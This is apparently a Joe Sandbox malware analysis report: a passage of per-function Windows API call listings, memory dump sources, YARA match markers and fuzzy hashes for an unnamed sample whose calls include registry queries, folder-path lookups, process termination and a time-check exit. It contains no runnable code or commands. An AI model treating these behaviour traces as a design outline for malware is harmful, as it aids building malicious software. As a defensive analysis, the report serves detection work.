                                                              • String ID: vector<T> too long$yxxx$yxxx$x@$x@
                                                              • API String ID: 2884196479-4254290729
                                                              • Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                              • Instruction ID: 642d6f8d25606cb57c5c368211f8c71801378994f2d8b98954bdbb6ac3618ebc
                                                              • Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                              • Instruction Fuzzy Hash: 3F31B7B5E005159BCB08DF58C9906AEBBB6EB88310F14827EE905EB385DB34A901CBD5
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02492A9C
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02492AA3
                                                                • Part of subcall function 02492B17: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 02492B2C
                                                                • Part of subcall function 02492B17: RtlAllocateHeap.NTDLL(00000000), ref: 02492B33
                                                                • Part of subcall function 02492B17: RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,02492AB0), ref: 02492B52
                                                                • Part of subcall function 02492B17: RegQueryValueExA.ADVAPI32(02492AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 02492B6C
                                                                • Part of subcall function 02492B17: RegCloseKey.ADVAPI32(02492AB0), ref: 02492B76
                                                              • RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,024897C7), ref: 02492AD8
                                                              • RegQueryValueExA.ADVAPI32(024897C7,00638C34,00000000,00000000,00000000,000000FF), ref: 02492AF3
                                                              • RegCloseKey.ADVAPI32(024897C7), ref: 02492AFD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                              • String ID: Windows 11
                                                              • API String ID: 3225020163-2517555085
                                                              • Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                              • Instruction ID: 8887e72a3d8a42cd3d53119fcf791ec308258582059de93786207d5c2091b6ef
                                                              • Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                              • Instruction Fuzzy Hash: BC018B71640309BFEB14DBA4AC89EEA7B6EEB44315F00115ABE09D3290DAB099448BE0
                                                              APIs
                                                                • Part of subcall function 02477977: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 024779AC
                                                                • Part of subcall function 02477977: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 024779F1
                                                                • Part of subcall function 02477977: strlen.MSVCRT ref: 02477A25
                                                                • Part of subcall function 02477977: StrStrA.SHLWAPI(?,0043508C), ref: 02477A5F
                                                                • Part of subcall function 02477977: strcpy_s.MSVCRT ref: 02477A88
                                                                • Part of subcall function 02477977: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02477A93
                                                                • Part of subcall function 02477977: HeapFree.KERNEL32(00000000), ref: 02477A9A
                                                                • Part of subcall function 02477977: strlen.MSVCRT ref: 02477AA7
                                                              • lstrcat.KERNEL32(00638E68,0043509C), ref: 02477C37
                                                              • lstrcat.KERNEL32(00638E68,?), ref: 02477C64
                                                              • lstrcat.KERNEL32(00638E68,004350A0), ref: 02477C76
                                                              • lstrcat.KERNEL32(00638E68,?), ref: 02477C97
                                                              • wsprintfA.USER32 ref: 02477CB7
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02477CE0
                                                              • lstrcat.KERNEL32(00638E68,00000000), ref: 02477CEE
                                                              • lstrcat.KERNEL32(00638E68,0043509C), ref: 02477D07
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                                              • String ID:
                                                              • API String ID: 2460923012-0
                                                              • Opcode ID: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
                                                              • Instruction ID: 7541028936cb8b51bb13517f42fbdde19cb7448eac0824cce1a5950a63b45afd
                                                              • Opcode Fuzzy Hash: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
                                                              • Instruction Fuzzy Hash: 5431B572900214EFDB24DB64DC44AEBFB7ABB88714B64151EFA1993310DB74E941CBA0
                                                              APIs
                                                              • memset.MSVCRT ref: 0248DB53
                                                              • RegOpenKeyExA.ADVAPI32(80000001,00638CD8,00000000,00020119,?,00000000,000000FE), ref: 0248DB73
                                                              • RegQueryValueExA.ADVAPI32(?,006388D4,00000000,00000000,?,?), ref: 0248DB9A
                                                              • RegCloseKey.ADVAPI32(?), ref: 0248DBA5
                                                              • lstrcat.KERNEL32(?,?), ref: 0248DBCB
                                                              • lstrcat.KERNEL32(?,00638968), ref: 0248DBDD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcat$CloseOpenQueryValuememset
                                                              • String ID:
                                                              • API String ID: 2623679115-0
                                                              • Opcode ID: 69500862d738dca9bfa499551e5225b9e751b41ace5b549e9b88ef694551efee
                                                              • Instruction ID: ce9bde37af921b4991c5c62db5fe0d240aae2f0c0f9c4ef8286bd54c1aa78182
                                                              • Opcode Fuzzy Hash: 69500862d738dca9bfa499551e5225b9e751b41ace5b549e9b88ef694551efee
                                                              • Instruction Fuzzy Hash: D6415CB16142499FD714EF25DC45FDE77EAAF84704F00882EB99C872A0DA71E948CF92
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,0248558F), ref: 024947CC
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 024947D3
                                                              • wsprintfW.USER32 ref: 024947E2
                                                              • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 02494851
                                                              • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 02494860
                                                              • CloseHandle.KERNEL32(00000000,?,?), ref: 02494867
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatewsprintf
                                                              • String ID:
                                                              • API String ID: 885711575-0
                                                              • Opcode ID: 86b9f473664707f9828ef1b286254fe0fdbf0f8e23cb3414a50381cb6247922d
                                                              • Instruction ID: 31569ac6d8edf4d734cc611177d9884f7317d5839b6ae7eacd9e1a6831f1f446
                                                              • Opcode Fuzzy Hash: 86b9f473664707f9828ef1b286254fe0fdbf0f8e23cb3414a50381cb6247922d
                                                              • Instruction Fuzzy Hash: B2318F71A00244BBDB20DFA5DC89FDEBB7AAF44740F100059FA05E7180DBB0A6418BA5
                                                              APIs
                                                              • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,004012EE), ref: 00409AFA
                                                              • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004012EE), ref: 00409B10
                                                              • LocalAlloc.KERNEL32(00000040,?,?,?,?,004012EE), ref: 00409B27
                                                              • ReadFile.KERNEL32(00000000,00000000,?,004012EE,00000000,?,?,?,004012EE), ref: 00409B40
                                                              • LocalFree.KERNEL32(?,?,?,?,004012EE), ref: 00409B60
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,004012EE), ref: 00409B67
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                              • String ID:
                                                              • API String ID: 2311089104-0
                                                              • Opcode ID: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
                                                              • Instruction ID: d5e2846254d17b4b79341e9ac440d2f7db04c9e9ad0a28dbd651dd387858d46a
                                                              • Opcode Fuzzy Hash: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
                                                              • Instruction Fuzzy Hash: 06114C71A00209AFE7109FA5ED84ABB737DFB04750F10016AB904A72C1EB78BD408BA8
                                                              APIs
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                                • Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
                                                                • Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A
                                                              • std::_Xinvalid_argument.LIBCPMT ref: 004089FD
                                                                • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                                • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                              • memcpy.MSVCRT(?,00000000,?,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408A5B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
                                                              • String ID: invalid string position$string too long
                                                              • API String ID: 2202983795-4289949731
                                                              • Opcode ID: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
                                                              • Instruction ID: 649aac53c67e3ee9f5cf0101b70db7c319c758bc323567c03d989288a4630d66
                                                              • Opcode Fuzzy Hash: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
                                                              • Instruction Fuzzy Hash: 0721F6723006108BC720AA5CEA40A6BF7A9DBA1760B20093FF181DB7C1DA79D841C7ED
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(004078EE,004088DD,03C3C3C3,00000401,004078EE,?,00000000,?,004078EE,80000001), ref: 00408B70
                                                              • std::exception::exception.LIBCMT ref: 00408B8B
                                                              • __CxxThrowException@8.LIBCMT ref: 00408BA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@Exception@8Throwstd::exception::exception
                                                              • String ID: Pv@$x@
                                                              • API String ID: 3448701045-2507878009
                                                              • Opcode ID: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
                                                              • Instruction ID: d532d441e19495b57cb34d138c3e0c88a0b377879b543fee6e4065129139ec29
                                                              • Opcode Fuzzy Hash: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
                                                              • Instruction Fuzzy Hash: 37F027B160020997EB18E7E08D027BF7374AF00304F04847EA911E2340FB7CD605819A
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(?,00408C9B,00000000,?,?,00000000), ref: 00408D92
                                                              • std::exception::exception.LIBCMT ref: 00408DAD
                                                              • __CxxThrowException@8.LIBCMT ref: 00408DC2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@Exception@8Throwstd::exception::exception
                                                              • String ID: Pv@$PC
                                                              • API String ID: 3448701045-1362088297
                                                              • Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                              • Instruction ID: c1c2e9470fcfd07362e0a09b01d9ac21ad58a2ed8b2a4eb6edd2c0a09cf1513b
                                                              • Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                              • Instruction Fuzzy Hash: 9AE02B7050030A97CB18F7B59D016BF73789F10304F40476FE965A22C1EF798504859D
                                                              APIs
                                                              • ??2@YAPAXI@Z.MSVCRT(?,02478F02,00000000,?,?,00000000), ref: 02478FF9
                                                              • std::exception::exception.LIBCMT ref: 02479014
                                                              • __CxxThrowException@8.LIBCMT ref: 02479029
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ??2@Exception@8Throwstd::exception::exception
                                                              • String ID: PC$PC
                                                              • API String ID: 3448701045-3524912142
                                                              • Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                              • Instruction ID: f57db25eb368c2a23d42c97431081f3ca6348c56cfbfccf1abc727a0415de353
                                                              • Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                              • Instruction Fuzzy Hash: B4E02B7491060956CB28EBB58D046FF73789F00314F00471FD83652280EB7085048A95
                                                              APIs
                                                              • StrCmpCA.SHLWAPI(?,00638AAC), ref: 024879D7
                                                              • StrCmpCA.SHLWAPI(?,00638C1C), ref: 02487AAF
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02487AE7
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02487B44
                                                                • Part of subcall function 024974A7: lstrcpy.KERNEL32(00000000), ref: 024974C1
                                                                • Part of subcall function 02471677: lstrcpy.KERNEL32(00000000,?), ref: 0247169E
                                                                • Part of subcall function 02471677: lstrcpy.KERNEL32(00000000,?), ref: 024716C0
                                                                • Part of subcall function 02471677: lstrcpy.KERNEL32(00000000,?), ref: 024716E2
                                                                • Part of subcall function 02471677: lstrcpy.KERNEL32(00000000,?), ref: 02471746
                                                                • Part of subcall function 02485E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 02485E7C
                                                                • Part of subcall function 02485E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02485EAB
                                                                • Part of subcall function 02485E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02485EDC
                                                                • Part of subcall function 02485E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02485F04
                                                                • Part of subcall function 02485E47: lstrcat.KERNEL32(00000000,00000000), ref: 02485F0F
                                                                • Part of subcall function 02485E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02485F37
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy$FolderPathlstrcat
                                                              • String ID:
                                                              • API String ID: 2938889746-0
                                                              • Opcode ID: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
                                                              • Instruction ID: b32de5885e60344b44178d561ce7f2a575a45b6dd77a51264430443dd18cd4aa
                                                              • Opcode Fuzzy Hash: 2bebba6af289712f080de957bcbf78d05df3d434af1be4e71e032b38b9078c2a
                                                              • Instruction Fuzzy Hash: 31F16075E102058FDB24EF29C454A5DBBF2AF85318F29C1AED8189B3A2D731D942CF91
                                                              APIs
                                                              • StrCmpCA.SHLWAPI(?,00638AAC), ref: 024879D7
                                                              • StrCmpCA.SHLWAPI(?,00638C1C), ref: 02487AAF
                                                              • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02487AE7
                                                              • lstrcpy.KERNEL32(00000000,?), ref: 02487B44
                                                              • StrCmpCA.SHLWAPI(?,00638D84), ref: 02487DE4
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpy
                                                              • String ID:
                                                              • API String ID: 3722407311-0
                                                              • Opcode ID: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
                                                              • Instruction ID: b7cd8ff0dd98c7b788b1b52a0f85caf03d3df21221c7c208bee4ce024501c246
                                                              • Opcode Fuzzy Hash: d89e5a93b16780a4945d7001f8fe04c944c6bc261c0c89bfee13aa78266d6684
                                                              • Instruction Fuzzy Hash: 97F16075E102058FDB24EF29C454A5DBBF2AF85314F29C1AED8189B3A2D731D942CF90
                                                              APIs
                                                              • lstrcpy.KERNEL32(00000000), ref: 02479F6F
                                                              • LocalAlloc.KERNEL32(00000040,?), ref: 02479FA1
                                                              • StrStrA.SHLWAPI(00000000,004351E8), ref: 02479FCA
                                                              • memcmp.MSVCRT(?,0042DC44,00000005), ref: 0247A003
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocLocallstrcpymemcmp
                                                              • String ID:
                                                              • API String ID: 4154055062-3916222277
                                                              • Opcode ID: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
                                                              • Instruction ID: 9410725084522395038e9ef95dcc68d4367678be9077dc21bbf09ac5b3d81942
                                                              • Opcode Fuzzy Hash: 57f8e19cb4e75aecd9d06e79b2a2f29f70109d821a836c89033672d7bb62ba8e
                                                              • Instruction Fuzzy Hash: D041A371A002959BCB10EFB5CC44AEF7BB6AF46304F04496AEC65A7352DB70E905CF90
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CodeInfoPageValidmemset
                                                              • String ID:
                                                              • API String ID: 703783727-0
                                                              • Opcode ID: 111c3c07fb09bc6f5b37efe096d1c8aea2b28741611527557449d701e77a25d6
                                                              • Instruction ID: 4f3171a194e8d742343db00a2a3dcfda1a785918b29c6430fabe85533d68f44e
                                                              • Opcode Fuzzy Hash: 111c3c07fb09bc6f5b37efe096d1c8aea2b28741611527557449d701e77a25d6
                                                              • Instruction Fuzzy Hash: 15310470A046818EEF258F75C88437ABFA09F02315F0849EFD891DF292CB2AC446C751
                                                              APIs
                                                              • GetSystemTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00421E28), ref: 00421B52
                                                                • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,0042D01C), ref: 0042182F
                                                                • Part of subcall function 00421800: lstrlenA.KERNEL32(009E6588,00000000,00000000,?,?,00421B61), ref: 00421840
                                                                • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 00421867
                                                                • Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00000000), ref: 00421872
                                                                • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218A1
                                                                • Part of subcall function 00421800: lstrlenA.KERNEL32(00435564,?,?,00421B61), ref: 004218B3
                                                                • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 004218D4
                                                                • Part of subcall function 00421800: lstrcatA.KERNEL32(00000000,00435564,?,?,00421B61), ref: 004218E0
                                                                • Part of subcall function 00421800: lstrcpy.KERNEL32(00000000,00000000), ref: 0042190F
                                                              • sscanf.NTDLL ref: 00421B7A
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421B96
                                                              • SystemTimeToFileTime.KERNEL32(?,?), ref: 00421BA6
                                                              • ExitProcess.KERNEL32 ref: 00421BC3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2241640249.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2241640249.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000471000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000478000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000004B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000055E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.2241640249.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                                                              • String ID:
                                                              • API String ID: 3040284667-0
                                                              • Opcode ID: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
                                                              • Instruction ID: 74431add482d266e5f481d4c3f26529432deb7ac332c40e3c7ddf6828a7bb522
                                                              • Opcode Fuzzy Hash: a2f6735c031ea2f4695345a85905500a2208e9f846abe19c5e0427cdd94a5bb9
                                                              • Instruction Fuzzy Hash: BD2102B1508301AF8344EF69D88485BBBF9EFD8304F409A1EF5A9C3220E774E5048FA6
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 0249336D
                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02493374
                                                              • RegOpenKeyExA.ADVAPI32(80000002,006389D4,00000000,00020119,?), ref: 02493393
                                                              • RegQueryValueExA.ADVAPI32(?,00638CEC,00000000,00000000,00000000,000000FF), ref: 024933AE
                                                              • RegCloseKey.ADVAPI32(?), ref: 024933B8
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2242908241.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2470000_1D71.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                              • String ID:
                                                              • API String ID: 3225020163-0
                                                              • Opcode ID: 49ee177b7729dda60db32b2962d7b5bd1a3cc4ed7fca1f7095805fab15dd51ff
